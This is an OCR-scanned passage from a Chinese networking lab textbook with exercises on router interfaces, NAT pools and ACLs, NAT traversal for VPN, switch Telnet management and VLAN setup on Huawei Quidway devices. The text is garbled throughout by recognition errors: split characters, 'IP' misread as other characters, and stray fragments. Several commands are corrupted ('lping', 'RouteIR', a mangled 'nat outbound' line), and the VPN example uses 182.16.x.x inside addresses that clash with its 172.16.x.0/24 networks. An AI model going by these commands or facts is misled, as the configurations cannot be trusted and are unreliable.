和 RouterC 的 El 接口 处 于 192.168.2.0/24 这 个 网 段 。 


192.168.1.1 ”RouterA 192.168.2.1 
255.255.255.0 255.255.255.0 
E0 El 
192.168.1.2 192.168.2.2 
255.255.255.0|E0 El1| 255.255.255.0 
RouterB RouterC 


图 2-11 实验 拓扑 图 


【实验 步骤 】 

(1) 按照 图 2-11 的 拓扑 图 将 路 由 器 连接 起 来 。 

(2) 分 别 配置 路 由 器 RouterA、RouterB 和 RouterC 。 
以 RouterA 为 例 ， 配 置 命 令 如 下 : 


[Router] sysname RouterA // 将 路 由 器 更 名 
[RouterR] interface ethernet 0 // 进 入 接口 配置 模式 


[RouterRA-Ethernet0]ip address 192.168.1.1 255.255.255.0 
// 为 接口 配置 IP 地 址 


[RouterA-Ethernet0]undo shut down // 管 理性 打开 接口 

% Interface Ethernet0 is up // 系 统 提 示 E0 接口 开启 
[RouterA-Ethernet0]quit // 退 出 接口 配置 模式 
[RouterA] 


配置 完成 后 可 以 用 “display interface ethernet0” 来 检查 配置 是 否 正确 。 
可 采用 同样 的 方法 配置 RouterB 和 RouterC。 需 要 注意 的 是 ，RouterA 要 配置 两 个 接 


口 E0 和 E1。 在 配置 完成 后 ， 要 输入 命令 “undo shutdown” 将 端口 打开 。RouterB 的 E0 
接口 卫 地 址 要 和 RouterA 的 在 同一 网 段 。RouterC 同 理 。 
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当 配置 完成 后 查看 接口 信息 ， 检 查 是 否 正确 。 

(3) 测试 路 由 器 是 否 连接 好 。 

如 果 将 RouterB 的 E0 接口 IP 地 址 配置 为 192.168.1.2， 则 在 RouterA 上 输入 : 
[RouterR]lping 192.168.1.2 //Ping RouterB 的 E0 接口 地 址 


若 出 现 如 下 回应 ， 则 说 明 配 置 连接 成 功 。 


PING 192.168.1.2: 56 data bytes, press CTRL C to break 
Reply from 192.168.1.2: bytes=56 Sequence=0 tt1l=255 time = 


2 ms 
Reply from 192.168.1.2: bytes=56 Sequence=1 tt1l=255 time = 2 ms 
Reply from 192.168.1.2: bytes=56 Sequence=2 tt1l=255 time = 3 ms 
Reply from 192.168.1.2: bytes=56 Sequence=3 tt1l=255 time = 2 ms 


ese 第 2 章 网 络 设备 配置 与 使 用 mm 
Reply from 192.168.1.2: bytes=56 Sequence=4 tt1l=255 time = 2 ms 


---192.168.1.2 ping statistics --— 
5 packets transmitted 
5 packets received 
0.00% packet loss 
round-trip min/avg/max = 2/2/3 ms 


若 出 现 如 下 回应 ， 则 说 明 配 置 或 连接 有 问题 。 


PING 192.168.1.2: 56 data bytes, press CTRL C to break 
Request time out 
Request time out 
Request time out 
Request time out 
Request time out 


-==192,.168.1.2 ping statistics 一 = 一 
5 packets transmitted 
0 packets received 
100.00% packet loss 


此 时 ， 应 首先 检查 线 绕 是 否 连接 正确 。 然 后 用 display 命令 查看 端口 是 否 开 启 ，IP 
地 址 是 否 配 置 正确 。 重 点 检查 有 线 绕 连 接 的 两 接口 的 IP 地 址 是 不 是 在 同一 网 段 。 
(4) 用 Ping 命令 测试 ， 观 察 从 RouterA 到 RouterC 是 否 可 以 Ping 通 。 


【实验 报告 】 
写 出 配置 三 台 路 由 器 的 命令 。 


【思考 题 】 
试 说 出 从 一 台 路 由 Ping 其 他 两 台 路 由 是 否 可 以 Ping 通 ， 为 什么 ? 


2.1.3 NAT 的 配置 


【实验 目的 】 
复习 前 面 学 习 的 路 由 器 知识 ， 将 设备 连接 起 来 ， 组 建 简单 网 络 。 并 掌握 网 络 地 址 转 
换 (Network Address Translation, NAT) 的 配置 方法 。 


【原理 简介 】 

网 络 地址 转换 (NAT)， 是 在 IP 地 址 日 益 短缺 的 情况 下 提出 的 。 目 前 ， 由 于 人 P 地 址 
的 长 度 为 32b， 因 此 因特网 地 址 资源 会 随 着 用 户 的 增加 而 耗 尽 。 为 了 解决 因特网 地 址 短 
缺 的 问题 ， 人 们 通常 在 内 部 网 络 设置 像 192.168.1.2 这 样 的 内 部 地 址 。 然 而 ， 此 类 IP 地 
址 在 因特网 上 无 法 识别 。 因 此 ， 必 须 在 网 关上 增加 NAT 转换 功能 ， 将 内 部 网 络 地 址 转换 
成 因特网 可 以 识别 的 因特网 地 址 〈 也 叫 外 网 地 址 )。 

NAT 配置 可 分 为 静态 NAT、 动 态 NAT 以 及 端口 NAT (PAT)。 静 态 NAT 的 作用 就 
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是 将 内 部 的 IP 地 址 和 外 部 的 合法 IP 地 址 一 一 对 应 ， 当 内 部 用 户 对 外 访问 时 ， 采 用 所 分 
配 的 外 网 卫 地址。 动态 NAT 采用 NAT 池 , 动态 地 为 内 部 需要 访问 外 部 的 主机 分 配合 法 
的 卫 地址 。PAT 就 是 整个 子 网 采用 一 个 IP 地 址 对 外 访问 ， 而 外 部 则 把 这 些 访问 识别 为 
来 自 一 个 IP 的 不 同 端口 的 访问 。 

访问 控制 列表 (Access Control List, ACL) 是 路 由 器 的 一 种 访问 控制 机 制 。 当 有 数据 
经 由 路 由 器 转发 时 ， 它 会 一 条 条 地 对 照 ACL 以 确定 此 次 访问 是 否 合法 。 如 果 合 法 ， 则 转 
发 数据 ;否则 丢弃 数据 〈 注 意 : 只 有 在 路 由 器 采用 了 NAT 配置 后 ，ACL 才 会 被 访问 ， 
它 也 才 拥 有 对 过 往 数据 的 控制 权限 。ACL 的 默认 配置 是 禁止 一 切 访问 )。 

【实验 环境 】 

Windows 2000 Server 服务 器 一 台 ，PC 一 台 ， 华 为 Quidway R2811 一 台 。 指 导 教 师 
可 按 实验 要 求 在 服务 器 上 配置 Web 服务 和 一 个 可 以 访问 的 IP 地 址 为 11.0.1.252 的 网 页 。 
实验 拓扑 示意 图 如 图 2-12 所 示 。 


NAT POOL 
11.0.1.251/8 
11.0.1.252/8 
11.0.1.253/8 


Internet 


E0:11.0.1.254/8 
E1:192.168.1.254/24 


Web Server HostA 
192.168.1.254/24 11.0.1.1/8 


图 2-12 实验 拓扑 图 


读者 只 需 配置 路 由 器 。 这 里 的 目的 是 要 让 HostA 可 以 访问 Web 服务 器 上 的 网 页 ,在 
HostA 上 的 浏览 器 中 输入 11.0.1.252 就 可 以 访问 实际 IP 地址 为 192.168.1.254 的 网 页 ， 也 
就 是 说 ， 通 过 NAT 可 以 达到 安全 隐藏 Web 服务 器 的 目的 。 


【实验 步骤 】 

(1) 按照 拓扑 图 连接 好 设备 , 配置 好 路 由 器 接口 地 址 , 不 要 忘 了 加 一 条 从 192.168.1.0 
网 段 到 达 11.0.0.0 网 段 的 静态 路 由 。 

(2) 配置 访问 控制 列表 。 

@ 标准 卫 访问 控制 列表 。 

一 个 标准 卫 访问 控制 列表 匹配 IP 包 中 的 源 地 址 或 源 地 址 中 的 一 部 分 ， 可 对 匹配 的 
包 采 取 拒 绝 或 允许 两 个 操作 。 编 号 范围 是 1 一 99 的 访问 控制 列表 是 标准 他 访问 控制 列表 。 

@ 扩展 卫 访 问 控制 列表 。 

扩展 卫 访问 控制 列表 比 标准 IP 访问 控制 列表 具有 更 多 的 匹配 项 ， 包 括 协议 类 型 、 
源 地 址 、 目 的 地 址 、 源 端口 、 目 的 端口 、 建 立 的 连接 和 IP 优先 级 等 。 编 号 范围 是 100 一 
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199 的 访问 控制 列表 是 扩展 他 访问 控制 列表 。 

@ 命名 的 他 访问 控制 列表 。 

所 谓 命名 的 IP 访问 控制 列表 是 以 列表 名 代替 列表 编号 来 定义 IP 访问 控制 列表 ， 同 
样 包括 标准 和 扩展 两 种 列表 ， 定 义 过 滤 的 语句 方法 与 编号 方式 相似 。 

其 中 ， 标 准 访问 控制 列表 是 最 简单 的 ACL。 它 的 具体 配置 方法 如 下 : 

e 输入 acl ACL 号 进入 ACL 设置 界面 

e@ rule permitldeny source IP 地 址 反 向 子 网 掩 码 

以 这 次 实验 为 例 , 要 允许 从 HostA 发 过 来 的 数据 包 通 过 路 由 器 到 达 Web 服务 器 , 需 
要 如 下 输入 : 

[Router]acl 10 //ACL 表 号 设 为 10, 所 以 是 标准 ACL 

[Router-acl-10]rule Permit source 11.0.1.0 0.255.255.255 

// 指 定 允 许 来 自 11.0.1.0 网 段 的 数据 包 通 过 . 输入 后 ,系统 提示 : Rule has been added 


//to normal packet-filtering rules 
[Router-acl-10] quit // 退 出 ACL 配置 模式 


(3) NAT Pool (NAT 池 ) 的 配置 。 
将 多 个 因特网 地 址 配置 在 路 由 器 的 E0 端口 上 ,动态 分 配给 内 部 主机 ， 使 它们 能 够 
访问 因特网 。 
命令 格式 : nat address 起 始 地 址 终止 地 址 NAT 池 的 名 字 
以 本 次 实验 为 例 ， 输 入 如 下 : 
[Router]nat address 11.0.1.251 11.0.1.253 RouterA 
// 起 始 地 址 为 11.0.1.251, 终止 地 址 为 11.0.1.253, 同 时 给 NAT 池 起 名 为 RouterA 


这 样 就 定义 了 一 个 NAT 地 址 池 。 
(4) 将 NAT 地 址 池 应 用 在 E0 接口 上 。 
首先 要 进入 接口 配置 模式 ， 然 后 配置 NAT 地 址 池 。 
配置 命令 如 下 : 


[Router] interface ethernet0 
[Router-Ethernet0]nat outbound 10 add RouteIR 

// 指 定 NAT 池 用 在 出 口 方向 , 使 用 AcL 10 并 指定 使 用 nat 池 RouterR 
[Router-Ethernet0]quit 


这 样 ， 配 置 就 完成 了 。 

(5) 观察 现象 。 

在 HostA 上 打开 浏览 器 (网 关 要 指定 为 11.0.1.254)， 然 后 输入 “11.0.1.252”， 观察 
是 不 是 能 够 看 到 Web 服务 器 上 的 网 页 。 

如 果 有 条 件 ,还 可 以 在 HostA 上 运行 Sniffer, 在 Web 服务 器 上 Ping HostA, 看 Sniffer 
抓 到 的 包 的 原 地 址 是 什么 ， 是 否 可 以 证 明 配 置 成 功 。 

(6) 条 件 允 许 的 情况 下 ， 在 Router 与 HostA 之 间 再 加 一 台 路 由 器 ， 并 做 NAT， 看 这 
时 HostA 是 不 是 还 可 以 访问 Web 服务 器 。 
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【实验 报告 】 

(1) 要 求 详细 写 出 路 由 器 的 配置 命令 。 

(2) 使 用 以 前 实验 中 讲 过 的 命令 查看 E0 和 El 接口 ， 观 察 有 什么 不 同 。 
(3) 条 件 允 许 的 情况 下 ， 可 对 第 二 步 截图 。 


【思考 题 】 
路 由 器 是 第 三 层 (网络 层 ) 交换 设备 ,根据 PAT 的 原理 及 实现 ， 请 考虑 它 是 否 仅 涉 


及 网 络 层 的 应 用 与 服务 ? 
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2.1.4 ”VPN 隧道 穿越 设置 


【实验 目的 】 

掌握 路 由 器 的 VPN 隧道 穿越 设置 。 

【原理 简介 】 

对 路 由 器 进行 NAT 配置 ， 以 实现 VPN 隧道 穿越 的 命令 格式 如 下 : 

nat server [ acl-number ] [ vpn-instance vpn-instance-name ] Protocol 
pro-typeglobal { global-addr [ global-port ] | current-interface | 


interface interface-typeinterface-number } inside host-addr [ host-port ] 


e@ acl-number: 访问 控制 列表 号 ， 范 围 为 2000 一 3999。 当 接收 到 由 内 部 服务 器 向 外 
发 送 的 报 文 时 ， 如 果 报 文 的 源 地 址 和 目的 地 址 是 此 ACL 允许 的 (或 者 对 应 的 
natserver 没有 配置 ACL) ， 则 对 报 文 进行 地 址 转换 ， 否 则 不 进行 地 址 转换 。 

e vpn-instance vpn-instance-name: 内 部 服务 器 所 属 VPN 的 虚拟 路 由 转发 实例 。 如 

果 不 设置 该 值 , 表示 内 部 服务 器 属于 一 个 普通 的 私 网 ,不 属于 某 一 个 MPLS VPN。 

global-addr: 提供 给 外 部 访问 的 JP 地址 (一 个 合法 的 他 地址 〉。 

global-port: 提供 给 外 部 访问 的 服务 的 端口 号 。 若 忽略 ， 将 和 host-port 的 值 一 致 。 

current-interface: 使 用 路 由 器 当前 公 网 接口 的 地 址 NAT Server 的 公 网 地 址 。 

interface interface-type interface-number: 指定 使 用 其 他 接口 的 地 址 作为 

NATServer 的 公 网 地 址 。 目 前 仅 支 持 LoopBack 接口 ， 且 必须 在 路 由 器 中 配置 。 

e@ host-addr: 服务 器 在 内 部 局 域 网 的 IP 地 址 。 

e host-port: 服务 器 提供 的 服务 端口 号 ， 范 围 为 0 一 65 535,， 常用 的 端口 号 可 以 用 关 
键 字 代替 。 如 : WWW 服务 端口 为 80， 同 时 可 以 使 用 www 代替 。FTP 服务 端口 
号 为 21， 同 时 可 以 使 用 ftp 代替 。 如 果 为 零 ， 表 示 任 何 类 型 的 服务 都 提供 ， 可 以 

用 any 关键 字 代替 。 如 果 没 有 配置 这 个 参数 ， 则 表示 是 any 的 情况 ， 相 当 于 
global-addr 和 host-addr 之 间 有 一 个 静态 的 连接 。 当 host-port 是 any 时 ,global-port 
也 必须 是 any， 和 否则 是 非法 配置 。 

e 可 用 global-port1、global-port2: 通过 两 个 端口 指定 一 个 端口 范围 ， 并 与 内 部 主机 
的 地 址 范围 构成 一 种 对 应 关系 。global-port2 必须 大 于 global-portl 。 
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e@ 同上 可 通过 host-addrl1、host-addr2 定义 一 组 连续 的 地 址 范围 ， 和 前 面 定义 的 端口 
范围 构成 一 一 对 应 的 关系 。host-addr2 必须 大 于 host-addr1。 该 地 址 范围 的 数量 必 
须 和 global-port1、global-port2 定义 的 端口 数量 相同 。 
e@ pro-type: 表示 卫 协议 承载 的 协议 类 型 ， 可 以 使 用 协议 号 ， 也 可 用 关键 字 代替 。 
如 : ICMP (协议 号 为 1) 、TCP (协议 号 为 6) 、UDP 协议 号 为 17) 。 
【实验 环境 】 
网 络 1、 网 络 2 和 网 络 3 中 任意 两 个 网 络 之 间 实 现 VPN 连接 。 对 网 络 1 和 网 络 2 的 
路 由 器 进行 设置 ， 使 VPN1 和 VPN2 之 间 的 IPSEC 包 能 够 穿越 相应 的 路 由 器 设备 〈 如 
图 2-13 所 示 )。 


Internet 


219.224.161.147 219.224.161.146 219.224.161.145 


网 络 1: 172.16.1.0/24 网 络 2: 172.16.2.0/24 网 络 3: 172.16.3.0/24 
图 2-13 实验 拓扑 图 


【实验 步骤 】 
网 络 1 的 路 由 器 设置 : 


nat Server protocol tcp global 219.224.161.147 any inside 182.16.1.1 any 
nat Server protocol udp global 219.224.161.147 any inside 182.16.1.1 any 


4 络 2 的 路 由 器 设置 : 


nat Server protocol tcp global 219.224.161.146 any inside 182.16.2.1 any 
nat Server protocol udp global 219.224.161.146 any inside 182.16.2.1 any 


到 


【实验 报告 】 
结合 VPN 的 硬件 设置 ， 比 较 设置 前 和 设置 后 VPN 连接 的 状态 。 
【思考 题 】 


根据 VPN 所 采用 的 协议 ， 思 考 为 什么 要 添加 UDP、TCP 穿越 ? 
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2.2.1 交换 机 配置 


【实验 目的 】 

(1) 掌握 二 /三 层 交换 机 的 使 用 。 
(2) 掌握 二 /三 层 交 换 机 的 配置 。 
(3) 掌握 二 /三 层 交换 机 的 信息 查阅 。 


【原理 简介 】 

交换 机 (Switch): 目前 比较 常见 的 多 为 二 层 交 换 机 ， 即 工作 在 OSI 参考 模型 第 二 层 
(数据 链 路 层 ) 的 设备 。 它 根据 数据 帧 中 的 MAC 地 址 进行 转发 ， 并 将 这 些 MAC 地 址 与 
其 对 应 的 端口 记录 在 内 部 数据 库 中 。 

作为 第 二 层 设 备 ， 交 换 机 有 以 下 几 个 显著 优势 。 

e 交换 机 不 对 数据 进行 更 多 的 拆 解 ， 因 此 交换 效率 高 。 

e 采用 交换 式 局 域 网 技术 ， 使 专用 带宽 被 用 户 独 享 ， 极 大 地 提高 了 传输 效率 。 

e@ 它 的 快速 交换 功能 、 多 个 接 入 接口 以 及 低廉 的 价格 ， 成 为 小 型 网 络 解决 方案 的 

选择 。 

e 交换 机 分 隔 了 冲突 域 。 

二 层 交 换 技 术 目 前 已 经 非常 成 熟 。 交 换 机 一 般 都 含有 专用 于 数据 包 转 发 的 ASIC 芯 
片 , 因此 它 的 转发 速度 非常 快 , 各 种 接口 模块 都 能 通过 速率 高 达 几 十 个 GB/s 的 高 速 交 换 
数据 。 

三 层 交 换 机 就 是 有 部 分 路 由 器 功能 的 交换 机 。 三 层 交 换 机 的 最 重要 目的 是 加 快 大 型 
局 域 网 内 部 的 数据 交换 , 所 具有 的 路 由 功能 也 是 为 这 一 目的 服务 的 , 能 够 做 到 一 次 路 由 ， 
多 次 转发 。 对 于 数据 包 转 发 等 规律 性 的 过 程 由 硬件 高 速 实 现 ， 而 像 路 由 信息 更 新 、 路 由 
表 维 护 、 路 由 计算 、 路 由 确定 等 功能 ， 由 软件 实现 。 

出 于 安全 和 管理 方便 的 考虑 ， 主 要 是 为 了 减 小 广播 风暴 的 危害 ， 必 须 把 大 型 局 域 网 
按 功 能 或 地 域 等 因素 划 成 一 个 个 小 的 局 域 网 ,这 就 使 VLAN 技术 在 网 络 中 得 以 大 量 应 用 ， 
而 各 个 不 同 VLAN 间 的 通信 都 要 经 过 路 由 器 来 完成 转发 ， 随 着 网 间 互 访 的 不 断 增加 。 由 
于 端口 数量 有 限 ， 而 且 路 由 速度 较 慢 ， 单 纯 使 用 路 由 器 来 实现 网 间 访 问 ， 会 限制 网 络 的 
规模 和 访问 速度 。 基 于 这 种 情况 三 层 交 换 机 便 应 运 而 生 ， 三 层 交 换 机 是 为 卫 设计 的 ， 接 
口 类 型 简单 , 拥有 很 强 的 二 层 包 处 理 能 力 , 非常 适用 于 大 型 局 域 网 内 的 数据 路 由 与 交换 ， 
它 既 可 以 工作 在 协议 第 三 层 替代 或 部 分 完成 传统 路 由 器 的 功能 ， 同 时 又 具有 几乎 同 于 第 
二 层 交换 的 速度 ， 且 价格 相对 便宜 。 

在 企业 网 和 教学 网 中 ， 一 般 会 将 三 层 交 换 机 用 在 网 络 的 核心 层 ， 用 三 层 交 换 机 上 的 
千 兆 端口 或 百 兆 端口 连接 不 同 的 子 网 或 VLAN。 不 过 应 清醒 认识 到 三 层 交 换 机 出 现 最 重 
要 的 目的 是 加 快 大 型 局 域 网 内 部 的 数据 交换 ， 所 具备 的 路 由 功能 也 多 是 围绕 这 一 目的 而 
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展开 的 ， 所 以 它 的 路 由 功能 没有 同一 档次 的 专业 路 由 器 强 。 毕 竟 在 安全 、 协 议 支持 等 方 
面 还 有 许多 欠缺 ， 并 不 能 完全 取代 路 由 器 工作 。 

交换 机 转发 数据 的 过 程 如 下 。 

交换 机 会 在 内 部 建立 并 维护 一 张 用 于 记录 MAC 和 自身 端口 映射 关系 的 表 。 通 过 这 
张 表 ， 交 换 机 可 以 快速 地 建立 内 部 通道 ， 达 到 快速 转发 的 目的 。 

(1) 当 交 换 机 从 自身 的 某 个 端口 接收 到 一 个 数据 帧 时 , 它 会 记录 下 这 个 帧 的 源 MAC 
地 址 ， 并 与 这 个 端口 建立 映射 关系 。 

(2) 再 读 取 帧 中 的 目的 MAC 地 址 ， 并 在 映射 表 中 查找 相应 的 端口 。 

(3) 如 果 有 关于 目的 MAC 地 址 与 端口 的 映射 ， 那么 把 数据 包 复制 到 目的 端口 。 

(4) 如 果 没 有 相应 的 映射 关系 ， 那 么 交换 机 将 把 数据 包 广播 到 所 有 端口 。 当 目的 主 
机 回应 时 ， 交 换 机 将 建立 新 的 映射 关系 ， 下 一 次 的 转发 就 不 需要 广播 了 。 

(5) 这 种 学 习 过 程 将 不 断 持续 ， 直 到 交换 机 的 所 有 端口 与 MAC 的 映射 关系 完成 。 

如 果 主 机 的 MAC 发 生变 化 ， 那 么 将 对 变化 的 端口 做 重新 的 映射 学 习 。 

下 面 一 组 图 就 是 交换 机 第 一 次 启动 时 的 学 习 过 程 。 

首次 启动 端口 1 要 向 端口 2 的 MAC 地 址 主机 发 送信 息 《〈 如 图 2-14 所 示 )， 但 是 交 
换 机 此 时 还 没有 映射 关系 ， 所 以 将 数据 帧 广播 到 所 有 端口 。 


上 1 1 ¥ 1 | 1 端 D4 


端口 !( 发 送 ) 一 一 端口 5 
端口 2( 接 收 ) 端口 6 
端口 3 一 一 端口 7 


图 2-14 端口 1 第 一 次 向 端口 2 发 送 数据 


端口 2 做 出 回应 (如 图 2-15 所 示 )， 端 口 1 在 上 一 步 已 做 了 映射 ， 所 以 数据 直接 发 
送 给 端口 1。 这 一 次 端口 2 也 做 了 映射 。 


内 部 数字 总 线 
| 人 
1 
| 端口 4 
端口 1( 发 送 ) 一 -一 党 口 5 
端口 2( 接 收 ) 一 一 一 一 一 一 一 端 06 
端口 3 端口 7 


图 2-15 端口 2 向 端口 1 发 送 一 个 帧 


在 接 下 来 的 通信 过 程 中 ， 由 于 这 两 个 端口 与 主机 的 MAC 已 做 了 映射 ， 所 以 可 以 直 
接 进 行 通信 ， 如 图 2-16 所 示 。 
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内 部 数字 总 线 
人 1 
| 1 端口 4 
端口 1( 发 送 ) 一 一 一 一 一 一 一 一 端 05 
端口 2( 接 收 ) -一 疝 吕 6 
端口 3 端口 7 


图 2-16 在 已 知 MAC/PORT 后 的 帧 路 径 


本 章 以 华为 交换 机 为 例 来 演示 交换 机 的 配置 与 工作 过 程 。 
本 实验 所 使 用 的 是 华为 Quidway LS-3928TP-SI 交 换 机 的 正视 图 ， 如 图 2-17 所 示 。 


10/100 1000 10/100/1000 Console 
Base-TX Base-X Base-T 


图 2-17 Quidway LS-3928TP-SI 交换 机 的 正视 图 


可 以 看 到 此 交换 机 前 面板 上 有 24 个 10/100Base-TX 自 适应 的 以 太 网 接口 , 还 有 两 个 
1000Base-X 的 光 接 口 、 两 个 10/100/1000Base-T 的 RJ-45 接口 以 及 Console 控制 接口 。 

下 面 介绍 一 下 这 些 接口 的 作用 。 

(1) 10/100Base-TX: 使 用 RJ-45 水 晶 头 和 双 绞 线 的 以 太 网 接口 ， 符 合 IEEE 802.3u 
标准 ， 支 持 10M 半 双 工 /全 双 工 ，100M 半 双 工 / 全 双 工 。 

(2) 1000Base-X 端口 : 此 端口 为 千 兆 以 太 网 接口 ， 可 以 连接 千 兆 的 光纤 模块 。 

(3) 10/100/1000Base-T 端口 : 为 自 适应 RJ-45 接口 ， 可 以 连接 百 光 和 千 兆 双 绞 线 。 

(4) Console (CON) 端口 : Console 端口 使 用 配置 专用 连 线 直 接连 接 计 算 机 的 串口 ， 
利用 终端 仿真 程序 (如 Windows 的 “超级 终端 进行 交换 机 配置 。 交 换 机 的 Console 
端口 多 为 RJ-45 接口 ， 如 果 Console 端口 为 RJ-45 接口 ， 请 直接 采用 直通 线 连接 至 一 台 
PC 的 串口 。 此 时 ， 在 PC 的 串口 上 要 安装 一 个 串口 /RJ-45 转换 器 。 

当然 ， 如 果 读 者 感 兴 趣 ， 可 以 自己 查找 资料 深入 了 解 这 些 接口 的 作用 。 


【实验 环境 】 
Quidway LS-3928TP-SI 以 太 网 交换 机 一 台 ，PC (主机 ) 一 台 ， 如 图 2-18 所 示 。 


网 线 


串口 /RJ-45 转 换 器 国有 


串口 线 
图 2-18 实验 拓扑 图 
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【实验 步 又 】 

交换 机 提供 如 下 三 种 配置 管理 方法 。 

(1) 通过 Console 口 进行 配置 管理 。 

(2) 通过 Telnet 进行 本 地 的 或 远程 管理 。 

(3) 熟悉 常用 的 几 个 系统 配置 或 维护 命令 。 

下 面 将 依次 讨论 如 何 通过 上 述 几 种 方法 完成 Quidway S 系列 交换 机 的 人 机 交互 


工作 。 


式 。 


设 
口 


络 
唯 - 


附 
是 
登 


1. Console 端口 配置 管理 
交换 机 Console 端口 的 连接 和 超级 终端 的 配置 与 路 由 器 的 配置 相同 , 这 里 不 再 袭 述 。 
2. Telnet 配置 管理 
Telnet 配置 管理 方法 是 网 络 工程 师 或 网 络 管理 员 使 用 最 广泛 的 一 种 设备 访问 控制 方 
它 通 过 局 域 网 或 广域网 实现 本 地 或 远程 的 访问 控制 。 但 是 它 的 使 用 必须 要 求 首先 对 
备 进行 初始 化 配置 ， 和 否则 用 户 无 法 正确 登录 和 访问 。 初 始 化 配置 只 能 通过 Console 端 
登录 进行 配置 。 
若 管理 员 和 网 络 工程 师 想 访问 某 交 换 机 ， 他 必须 能 够 确定 被 访问 的 交换 机 。 当 今 网 
都 是 使 用 IP 地 址 来 标识 网 络 设备 , 所 以 进行 Telnet 配置 管理 的 前 提 是 交换 机 必须 具有 
-的 耳 地 址 。 
1) 配置 交换 机 的 管理 人 P 地 址 


[Quidway]interface Vlan-interface 1 
[Quidway-Vlan-interfacel] ip address 10.0.0.1 255.0.0.0 


此 时 请 配置 实验 主机 的 IP 地 址 与 Vlan-interfacel 处 于 同一 网 段 ， 然 后 使 用 Windows 
带 的 Telnet 终端 软件 访问 10.0.0.1， 会 出 现 提示 “Login password has not been set!”。 这 
因为 Quidway S 系列 交换 机 为 了 保证 网 络 设备 的 安全 而 实现 的 , 即 默认 情况 下 ，Telnet 
录用 户 需 要 认证 。 所 以 在 使 用 Telnet 之 前 必须 设置 登录 认证 ， 否 则 禁止 登录 。 

2) 配置 Telnet 用 户 认证 

同 Console 端口 登录 用 户 一 样 ，Telnet 登录 用 户 也 有 三 种 认证 方式 , 并 且 它 们 的 认证 


方式 也 一 样 。 在 此 先 以 本 地 口令 认证 为 例 ， 请 执行 如 下 配置 命令 : 


[Quidway]user-interface vty 0 4 
[Quidway-ui-vty0-4]authentication-mode password 
[Quidway-ui-vty0-4]set authentication password simple huawei 


完成 配置 后 再 次 使 用 Telnet 终端 登录 10.0.0.1， 按 照 交换 机 提示 输入 password: 


huawei， 即 可 进入 用 户 视 图 。 此 时 可 以 看 看 当前 用 户 命 令 控制 的 级 别 是 什么 。 


3. Quidway S 系列 以 太 网 交换 机 常用 配置 命令 
网 络 工 程 师 和 设备 管理 员 在 配置 网 络 设备 过 程 中 ， 往 往 需 要 查看 设备 配置 信息 ， 删 


除 配 置 或 者 重新 启动 设备 ， 等 等 。 在 此 介绍 几 个 常用 的 公用 命令 ， 以 便 读者 在 后 面 的 实 
验 过 程 中 能 够 避免 一 些 不 必要 的 麻烦 。 
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1) 查看 当前 配置 
设备 是 否 正 常 运行 ， 取 决 于 当前 的 配置 是 否 正 确 ， 所 以 在 设备 配置 过 程 中 和 故障 排 
除 中 ， 查 看 当前 配置 是 必 不 可 少 的 操作 之 一 。 


<Quidway>display current-configuration 


2) 保存 当前 设备 配置 

当前 设备 配置 运行 于 设备 的 内 存 中 ， 如 果 设 备 重启 ， 系 统 将 从 Flash 中 读 取 配置 数 
据 进行 网 络 设备 的 初始 化 。 所 以 ， 为 了 保证 网 络 设备 在 重新 启动 之 后 仍 能 够 正常 工作 。 
完成 配置 之 后 一 定 要 将 当前 配置 保存 到 Flash 存储 器 中 。 


<Quidway>save 


3) 查看 Flash 中 的 配置 信息 
为 了 肯定 当前 配置 和 Flash 中 的 配置 信息 完全 一 致 ,还 常常 需要 查看 Flash 中 的 配置 
信息 。 


<Quidway>display saved-configuration 


4) 删除 Flash 中 的 配置 信息 

为 了 防止 设备 原始 配置 的 影响 ， 在 进行 网 络 设备 配置 或 实验 之 前 ， 需 要 清除 当前 配 
置 , 但 是 如 果 Flash 中 存在 以 前 的 配置 信息 ， 设 备 启 动 后 的 当前 配置 就 和 Flash 中 的 配置 
一 样 。 一 般 而 言 ， 认 为 使 用 配置 命令 进行 业务 取消 耗 时 费力 ，Quidway S 系列 以 太 网 交 
换 机 能 够 通过 擦 除 Flash 中 的 配置 信息 后 重启 设备 达到 清除 配置 信息 的 目的 。 

<Quidway>reset saved-configuration 

5) 重启 交换 机 

在 前 面 的 配置 命令 介绍 中 已 经 提 到 过 清除 配置 信息 时 ， 需 要 重新 启动 网 络 设 备 ， 其 
实 ， 在 某 些 时 候 为 了 让 某 些 修改 后 的 配置 信息 生效 ， 也 需要 重启 交换 机 。 

<Quidway>reboot 

6) 显示 系统 软件 版 本 

在 网 络 飞 速 发 展 的 今天 ， 网 络 设备 系统 的 更 新 、 升 级 成 为 必然 。 在 进行 设备 配置 和 
故障 诊断 时 ， 检 查 系统 软件 版 本 也 是 排除 故障 的 重要 信息 之 一 。 通 过 下 面 的 配置 命令 可 
以 看 到 系统 的 详细 版 本 信息 ， 以 提供 有 效 参 考 。 


<Quidway>display version 

【实验 报告 】 

(1) 使 用 上 述 的 display 命令 ， 记 录 Flash 信息 和 版 本 信息 。 
(2) 记录 所 使 用 交换 机 的 特征 。 
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【思考 题 】 
在 一 个 用 交换 机 组 建 的 网 络 里 ， 利 用 其 中 一 台 PC 上 的 抓 包 软件 ， 抓 到 的 数据 包 的 
目的 地 址 是 什么 ? 


2.2.2 VLAN 划分 


【实验 目的 】 
掌握 VLAN 的 基本 概念 ， 学 会 在 交换 机 上 划分 VLAN 的 操作 。 


【原理 简介 】 

VLAN (Virtual Local Area Network) 就 是 虚拟 局 域 网 的 简称 。VLAN 可 以 不 考虑 用 
户 的 物理 位 置 ， 而 根据 功能 、 应 用 等 因素 将 用 户 从 逻辑 上 划分 为 一 个 个 功能 相对 独立 
的 工作 组 ， 每 个 用 户主 机 都 连接 在 一 个 支持 VLAN 的 交换 机 端口 上 并 属于 一 个 VLAN。 
同一 个 VLAN 中 的 成 员 都 共享 广播 ,形成 一 个 广播 域 , 而 不 同 VLAN 之 间 广 播 信息 是 相 
互 隔离 的 ， 这 样 做 主要 是 为 了 减 小 广播 风暴 的 


危害。 SwitchA 


【实验 环境 】 
一 台 LS-3928TP-SI 型 交换 机 ，2 一 3 台 PC， 
网 络 连接 如 图 2-19 所 示 。 


E0/3 EO0/13 
E0/9 


HostA HostB HostC 


【实验 步 又 】 172.30.0.123 172.30.0.120 172.30.0.152 
(1) 按照 前 面 讲 过 的 交换 机 配置 方法 ， 根 图 2-19 实验 拓扑 图 
据 图 2-19 设置 实验 PC 的 IP 地 址 。 
(2) 配置 交换 机 端口 3 一 端口 9 属于 VLAN 2: 
[Quidway]vlan 2 // 创 建 并 进入 VLAN 2 配置 模式 


[Quidway -vlan2]port Ethernet 0/3 to ethernet0/9 // 将 端口 3~9 加 入 VLAN 2 


